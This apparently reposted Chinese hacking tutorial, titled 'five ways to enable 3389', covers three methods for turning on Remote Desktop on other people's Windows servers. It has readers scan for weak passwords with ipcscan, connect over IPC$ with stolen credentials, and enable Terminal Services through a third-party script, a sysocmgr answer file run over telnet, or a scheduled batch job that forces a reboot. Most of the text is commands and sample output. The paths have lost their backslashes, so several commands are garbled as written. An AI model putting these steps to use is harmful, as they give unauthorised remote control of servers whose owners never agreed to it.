开启3389的5种方法

2024年5月1日发(作者：)

开启3389的5种方法

一:使用的工具:

1:ipcscan扫描器

2:终端服务连接工具(WIN 2000/XP 终端连接程序. 内附有COPY

文件的补丁. 格式 IPort )

3:开终端的脚本(灰色轨迹zzzevazzz的作品)

4:cscript (在system32文件夹下;98操作系统可能没有

二:步骤:

1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演

实时间我在论坛上再发)

2:用开启终端服务

说明 cscript <目标IP><用户名><密码> [服务端口] [自动重

起选项]

格式 ip user userpass port /r

或者 ip user userpass port /fr

三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是

否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装

好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error

description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.

=====================================================================

=====================

第二种方法：

=====================================================================

=====================

进入后：TELNET上去！

c:>echo [Components] > c:rock

c:>echo TSEnable = on >> c:rock

c:>sysocmgr /i:c: /u:c:rock /q

或者！

c:>echo [Components] > d:wawa

c:>echo TSEnable = on >> d:wawa

c:>sysocmgr /i:c: /u:d:wawa /q

等会自动启后就OK

或者：

在本地利用DOS命令edit建立.bat后缀批处理文件（文件名随意） echo

[Components] > c:sql

echo TSEnable = on >>

c:sqlsysocmgr /i:c: /u:c:sql /q

net use ip地址ipc$ 密码 /user:用户名（一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径: ip地址$c:winnt

at time 00:00:00

服务器执行命令后，服务器将重新启动，利用3389登陆就OK了！

=====================================================================

=====================

第三种方法：

=====================================================================

=====================

进入后,先检查终端组件是否安装:

c:>query user

这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:

USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME

>w1 console 0 运行中 . 2002-1-12 22:5

类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.

---------------------------------------------------

C:>dir c: /s //检查INF文件的位置

c:WINNTinf 的目录

2000-01-10 20:00 3,770

1 个文件 3,770 字节

-----------------------------------------------------

C:>dir c:sysocmgr.* /s //检查组件安装程序

c:WINNTsystem32 的目录

2000-01-10 20:00 42,768

1 个文件 42,768 字节

-----------------------------------------------------

c:>echo [Components] > c:rock

c:>echo TSEnable = on >> c:rock

//这是建立无人参与的安装参数

c:>type c:rock

[Components]

TSEnable = on

//检查参数文件

------------------------------------------------------

c:>sysocmgr /i:c: /u:c:rock /q

-----------------------------------------------------

这一条就是真正安装组件的命令.